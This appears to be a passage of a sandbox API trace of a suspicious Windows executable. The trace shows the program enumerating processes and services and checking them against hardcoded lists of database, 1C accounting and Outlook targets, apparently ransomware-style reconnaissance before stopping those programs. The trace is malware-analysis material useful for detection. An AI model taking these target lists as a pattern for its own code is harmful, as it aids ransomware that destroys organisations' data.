	[0142.843] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.844] lstrlenW (lpString="svchost.exe") returned 11
	[0142.844] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0142.844] lstrlenW (lpString="spoolsv.exe") returned 11
	[0142.844] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.844] lstrlenW (lpString="svchost.exe") returned 11
	[0142.844] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0142.845] lstrlenW (lpString="taskhost.exe") returned 12
	[0142.845] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0142.845] lstrlenW (lpString="userinit.exe") returned 12
	[0142.845] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0142.845] lstrlenW (lpString="dwm.exe") returned 7
	[0142.845] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0142.846] lstrlenW (lpString="explorer.exe") returned 12
	[0142.846] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0142.846] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0142.846] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0142.846] lstrlenW (lpString="reader_sl.exe") returned 13
	[0142.846] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0142.847] CloseHandle (hObject=0x3ac) returned 1
	[0142.847] Sleep (dwMilliseconds=0x1f4) 
	[0143.372] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616f80
	[0143.422] EnumServicesStatusExW (in: hSCManager=0xb616f80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0143.422] GetLastError () returned 0xea
	[0143.422] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0143.422] EnumServicesStatusExW (in: hSCManager=0xb616f80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0143.423] CloseServiceHandle (hSCObject=0xb616f80) returned 1
	[0143.423] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0143.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0143.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0143.423] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0143.423] lstrlenW (lpString="AudioSrv") returned 8
	[0143.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0143.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0143.423] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0143.423] lstrlenW (lpString="BFE") returned 3
	[0143.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0143.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0143.423] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0143.423] lstrlenW (lpString="CryptSvc") returned 8
	[0143.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0143.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0143.423] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0143.424] lstrlenW (lpString="CscService") returned 10
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0143.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0143.424] lstrlenW (lpString="DcomLaunch") returned 10
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0143.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0143.424] lstrlenW (lpString="Dhcp") returned 4
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0143.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0143.424] lstrlenW (lpString="Dnscache") returned 8
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0143.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0143.424] lstrlenW (lpString="DPS") returned 3
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0143.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0143.424] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0143.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0143.424] lstrlenW (lpString="eventlog") returned 8
	[0143.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0143.425] lstrlenW (lpString="EventSystem") returned 11
	[0143.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0143.425] lstrlenW (lpString="gpsvc") returned 5
	[0143.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0143.425] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0143.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0143.425] lstrlenW (lpString="lmhosts") returned 7
	[0143.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0143.425] lstrlenW (lpString="MMCSS") returned 5
	[0143.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0143.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0143.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0143.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0143.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0143.426] lstrlenW (lpString="MpsSvc") returned 6
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0143.426] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0143.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0143.426] lstrlenW (lpString="NlaSvc") returned 6
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0143.426] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0143.426] lstrlenW (lpString="nsi") returned 3
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0143.426] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0143.426] lstrlenW (lpString="PcaSvc") returned 6
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0143.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0143.426] lstrlenW (lpString="PlugPlay") returned 8
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0143.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0143.426] lstrlenW (lpString="Power") returned 5
	[0143.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0143.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0143.426] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0143.427] lstrlenW (lpString="ProfSvc") returned 7
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0143.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0143.427] lstrlenW (lpString="RpcEptMapper") returned 12
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0143.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0143.427] lstrlenW (lpString="RpcSs") returned 5
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0143.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0143.427] lstrlenW (lpString="SamSs") returned 5
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0143.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0143.427] lstrlenW (lpString="Schedule") returned 8
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0143.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0143.427] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0143.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0143.427] lstrlenW (lpString="SENS") returned 4
	[0143.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0143.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0143.428] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0143.428] lstrlenW (lpString="ShellHWDetection") returned 16
	[0143.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0143.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0143.428] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0143.428] lstrlenW (lpString="Spooler") returned 7
	[0143.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0143.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0143.428] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0143.428] lstrlenW (lpString="Themes") returned 6
	[0143.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0143.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0143.428] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0143.428] lstrlenW (lpString="UxSms") returned 5
	[0143.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0143.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0143.428] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0143.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0143.428] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0143.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388
	[0143.430] Process32FirstW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0143.431] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0143.431] lstrlenW (lpString="System") returned 6
	[0143.431] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0143.431] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0143.431] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0143.432] lstrlenW (lpString="smss.exe") returned 8
	[0143.432] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0143.432] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0143.432] lstrlenW (lpString="csrss.exe") returned 9
	[0143.432] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0143.432] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0143.432] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0143.432] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0143.432] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0143.432] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0143.432] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0143.433] lstrlenW (lpString="wininit.exe") returned 11
	[0143.433] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0143.433] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0143.433] lstrlenW (lpString="csrss.exe") returned 9
	[0143.433] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0143.433] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0143.433] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0143.433] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0143.433] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0143.433] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0143.434] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0143.434] lstrlenW (lpString="winlogon.exe") returned 12
	[0143.434] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0143.434] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0143.434] lstrlenW (lpString="services.exe") returned 12
	[0143.434] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0143.434] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0143.435] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
